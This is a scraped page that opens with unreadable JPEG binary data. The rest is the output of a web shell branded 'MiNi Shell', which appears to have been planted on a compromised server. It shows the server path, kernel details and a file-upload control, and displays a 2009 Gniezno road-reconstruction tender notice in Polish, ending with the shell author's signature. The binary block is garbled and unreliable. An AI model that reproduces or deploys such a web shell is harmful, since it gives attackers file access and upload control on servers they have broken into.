JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090331/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090331/85002-N-2009.html

<p class="kh_header"><b>Gniezno: Przebudowa nawierzchni ul. Żeromskiego w Gnieźnie</b><br>
<b>Numer ogłoszenia: 85002 - 2009; data zamieszczenia: 31.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Gniezno , ul. Lecha 6, 62-200 Gniezno, woj. wielkopolskie, tel. 61 4260400, faks 061 4261687.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gniezno.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa nawierzchni ul. Żeromskiego w Gnieźnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakres przedmiotu zamówienia obejmuje:
1.1. przebudowę ul. Żeromskiego - Odcinek 1 (od ul. Roosevelta do ul. Kołłątaja)
A. Etap I - jezdnia:
- roboty przygotowawcze i rozbiórkowe,
- roboty ziemne,
- wykonanie nawierzchni jezdni łącznie z krawężnikiem, opornikiem, ściekiem i progami zwalniającymi, 
- regulacja wysokościowa zaworów urządzeń podziemnych, 
- oznakowanie pionowe (znaki), 
- oznakowanie poziome,   
- kanalizacja deszczowa Etap I (roboty ziemne, kanał, studnie rewizyjne, studzienki ściekowe, wymiana włazów kanałowych, czyszczenie kanału),
- wykonanie przyłączy wody Etap I (roboty ziemne, przyłącza, nawiertka, płukanie przyłączy),         
B.  Etap III - chodniki, wjazdy, pas postojowy:
- roboty przygotowawcze i rozbiórkowe,
- roboty ziemne,
- ustawienie obrzeży,
- wykonanie nawierzchni pasa postojowego, wjazdów, chodników,
- regulacja wysokościowa studni i zaworów urządzeń podziemnych,                                                   
1.2.	przebudowę ul. Żeromskiego - Odcinek 2 (od ul. Kołłątaja do ul. Kochanowskiego)
A.	Etap II- jezdnia:
- roboty przygotowawcze i rozbiórkowe,
- roboty ziemne,
- wykonanie nawierzchni jezdni łącznie z krawężnikiem, ściekiem i progiem zwalniającym,
- regulacja wysokościowa zaworów urządzeń podziemnych, 
- oznakowanie pionowe (znaki),
- oznakowanie poziome,
- kanalizacja deszczowa Etap II (roboty rozbiórkowe, roboty ziemne, studnie rewizyjne, kanał, studzienki ściekowe, wymiana włazów kanałowych, remont kanalizacji),
B.	Etap IV - chodniki, wjazdy, pas postojowy:
- roboty przygotowawcze i rozbiórkowe,
- roboty ziemne,
- ustawienie obrzeży,
- wykonanie nawierzchni pasa postojowego, zjazdów, chodników, 
- regulacja wysokościowa studni i zaworów urządzeń podziemnych,
- demontaż i montaż hydrantu. 
2.	W ramach realizacji przedmiotu zamówienia Wykonawca zapewnia:
2.1.	Wykonanie oznakowania miejsca realizowania przedmiotu zamówienia na własny koszt, zgodnie z Załącznikami do Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r. Nr 220 poz. 2181) oraz z Rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzeniem (Dz.U.03.177.1729), na podstawie projektu tymczasowej zmiany organizacji ruchu i zabezpieczenia robót, zatwierdzonego przez Zarządcę drogi, Organ Zarządzający Ruchem - Starostwo Powiatowe, Komendę Powiatową Policji w Gnieźnie. Ww. projekt należy wykonać na własny koszt.
2.2.	Obsługę geodezyjną (wytyczenie w terenie, wykonanie inwentaryzacji powykonawczej), 
2.3.	Utrzymanie w czystości ulic o nawierzchni bitumicznej (zgodnie z przepisami wynikającymi z ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach /Dz.U.05.236.2008 ze zm./) przylegających do placu budowy, którymi odbywa się ruch pojazdów Wykonawcy, w okresie trwania robót. 
2.4.	 Po wykonaniu robót Wykonawca jest zobowiązany do uporządkowania terenu objętego przedmiotem zamówienia.
2.5.	 Narzędzia i urządzenia niezbędne do wykonania zamówienia, w tym między innymi: koparko-spycharkę kołową, koparkę kołową, równiarkę samojezdną, zrywarkę przyczepną lub frezarkę, walec statyczny samojezdny min. 10 Mg, walec wibracyjny samojezdny min. 7 Mg, zagęszczarkę wibracyjną spalinową, ubijak spalinowy, samochód dostawczy, samochód skrzyniowy min.  5 Mg, samochód wywrotka min. 5 Mg, samochód WUKO, rozściełacz do wykonania podbudowy z tłucznia twardego, przecinarka betonu, piła do ciecia asfaltu, sprężarkę spalinową, żuraw samochodowy, beczkowóz. Ilość narzędzi i urządzeń wykorzystanych do realizacji zadania winna zapewnić właściwe tempo realizowanego zadania, w okresie objętym umową.  Wszystkie narzędzia i urządzenia winny być dobrane w ten sposób, by nie spowodować niekorzystnego wpływu na jakość wykonywanych robót, 
3.	Wymagania jakościowe:
3.1.	Materiały z odzysku (rozebrana nawierzchnia bitumiczna, krawężniki, ławy, podbudowy tłuczniowe), użyte do realizacji przedmiotu zamówienia winny być odpowiednio przygotowane do ponownego wbudowania (oczyszczone z ziemi, rozkruszone). Materiały nowe powinny posiadać gwarancję jakości min. 36 m-cy. Dostarczone materiały i urządzenia powinny posiadać określone obowiązującymi w tym zakresie polskimi przepisami dopuszczenia do stosowania (PN, atesty, aprobaty techniczne itp.), ewentualnie certyfikaty bezpieczeństwa oraz gwarancje uzyskane od producenta, które zostaną przekazane Zamawiającemu przy odbiorze częściowym i końcowym. W/w materiały winny spełniać postanowienia ustawy z dnia 16.04.2004r. o wyrobach budowlanych (Dz. U. Nr 92 poz.881).
3.2.	Okres gwarancji na wykonane roboty wynosi min. 36 m-cy. 
Przedmiot zamówienia należy wykonać w oparciu o: dokumentację budowlano - wykonawczą na przebudowę ulicy, dokumentację budowlano - wykonawczą na remont kanalizacji ogólnospławnej wraz z wykonaniem przyłączy wodociągowych, projekt docelowej organizacji ruchu kołowego przedmiary robót, szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający przewiduje wniesienie wadium w wysokości 30.000,00zł. Dowód wniesienia wadium w przypadku wpłaty na konto lub wadium w pozostałych formach należy dostarczyć w formie oryginału do Urzędu Miejskiego w Gnieźnie, ul. Lecha 6, Referat Księgowości Budżetowej pok. Nr 3 , do dnia 21.04.2009r.,do godz. 12.00.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1. spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych,
2.	nie podlegają wykluczeniu na podst. art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych, 
3.	dysponują lub będą dysponowali osobami zdolnymi do wykonania zamówienia w tym:-min. 1 osobą, która ma uprawnienia budowlane kierownika budowy (w specjalności budownictwo drogowe lub inżynieryjno - drogowe) i posiada zaświadczenie o przynależności do Polskiej Izby Inżynierów Budownictwa, z ważnością na dzień otwarcia ofert. W przypadku wybrania oferty ww. zaświadczenie będzie aktualizowane na min. pół roku z góry. 
-min. 1 osobę, która ma uprawnienia budowlane w specjalności instalacyjno - inżynieryjnej w zakresie sieci wodociągowej i kanalizacyjnej oraz posiada zaświadczenie o przynależności do Polskiej Izby Inżynierów Budownictwa, z ważnością na dzień otwarcia ofert. W przypadku wybrania oferty ww. zaświadczenie będzie aktualizowane na min. pół roku z góry.
-min. 2 pracownikami, którzy odbyli szkolenie z zakresu wykonywania niektórych czynności związanych z kierowaniem ruchem drogowym (art. 6 ustawy Prawo o ruchu drogowym) i posiadają aktualne zaświadczenie o przebytym szkoleniu,
4.	dysponują lub będą dysponowali narzędziami i urządzeniami niezbędnymi do wykonania zamówienia, w tym sprzętem określonym w pkt. 2.2.5 siwz,   
5.	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,
6.	wykonali minimum trzy roboty budowlane z branży drogowej (nawierzchnie: z betonowej kostki brukowej, z kostki kamiennej, klinkierowe, z płyt betonowych itp.), o wartości min. 600.000,00zł każda, w tym min. dwie z tych robót jako generalny wykonawca, w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, oraz załączyli dokumenty potwierdzające, że roboty te zostały wykonane należycie (np. list referencyjny),
Ocena warunków udziału w postępowaniu nastąpi na podstawie oświadczeń i dokumentów przewidzianych w ustawie Prawo zamówień publicznych i Rozporządzeniu Prezesa Rady Ministrów  z dnia 19.05.2006 r. (Dz. U. z 2006r. Nr 87, poz. 605 ze zm.), wymaganych w pkt. 15.3 specyfikacji.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Pisemne oświadczenie o wiarygodności Wykonawcy na podstawie art. 22 ust. 1 oraz  art. 24 ust. 1 i 2 złożonego wg załącznika nr 2 do specyfikacji. W treści oświadczenia Wykonawca deklaruje, że:
-posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
-posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
-znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
-nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy PZP.; 
2.	 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
3.	aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4.	aktualna informacja z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5.	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. Wykaz winien obejmować zarówno osoby z nadzoru, jak również osoby bezpośrednio wykonujące zadanie.
Dodatkowo należy załączyć:
- dowód posiadania uprawnień budowlanych kierownika budowy (w specjalności budownictwo drogowe lub inżynieryjno-drogowe) i dowód posiadania uprawnień budowlanych w specjalności instalacyjno - inżynieryjnej w zakresie sieci wodociągowej i kanalizacyjnej przez osobę kierującą robotami kanalizacyjno - wodnymi, 
- aktualne zaświadczenia o przynależności do Polskiej Izby Inżynierów Budownictwa, z ważnością na dzień otwarcia ofert, dla kierownika budowy (w specjalności budownictwo drogowe lub inżynieryjno - drogowe) i osoby kierującej robotami kanalizacyjno - wodnymi (w specjalności instalacyjno - inżynieryjnej w zakresie sieci wodociągowej i kanalizacyjnej. W przypadku wybrania oferty zaświadczenia będą aktualizowane na min. pół roku z góry.
- aktualne zaświadczenie o przebytym szkoleniu (min. 2 pracowników) z zakresu wykonywania niektórych czynności związanych z kierowaniem ruchem drogowym (art. 6 ustawy Prawo o ruchu drogowym). 
Jeżeli Wykonawca na dzień składania ofert nie dysponuje pracownikami o ww. kwalifikacjach, podanymi w wykazie osób, którymi będzie dysponował, jest zobowiązany do złożenia pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zadania z podaniem zakresu wykonywanych przez nie czynności;
6.	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca dla wykonania przedmiotu zamówienia, ze wskazaniem tytułu prawnego do ich użytkowania (np. własność, wynajem, dzierżawa), określonymi m.in. w pkt. 2.2.5. niniejszej siwz. Jeżeli Wykonawca na dzień składania ofert nie dysponuje ww. sprzętem, do oferty należy załączyć pisemne zobowiązanie innego podmiotu do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń;
7.	aktualna polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, 
8.	wykaz wykonanych minimum trzech robót z budowlanych branży drogowej (nawierzchnie: z betonowej kostki brukowej, z kostki kamiennej, klinkierowe, z płyt betonowych itp.) o wartości min. 600.000,00 zł każda, w tym min. dwie z tych robót jako generalny wykonawca, w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. list referencyjny),
Wszystkie złożone dokumenty winny dotyczyć Wykonawcy, którym jest zgodnie z art. 2 pkt. 11 ustawy Prawo zamówień publicznych (Dz. U. z 2007r. Nr 223, poz. 1655 ze zm.) osoba fizyczna, osoba prawna albo jednostka organizacyjna nieposiadająca osobowości prawnej, która ubiega się o udzielenie zamówienia publicznego, złożyła ofertę lub zawarła umowę w sprawie zamówienia publicznego.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gniezno.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Gnieźnie ul. Lecha 6 , pok. Nr 7, w godz. 8-15, (cena kompletu 300,00 zł brutto).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2009 godzina 12:00, miejsce: Urząd Miejski w Gnieźnie ul. Lecha 6 ,Biuro Obsługi Interesanta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com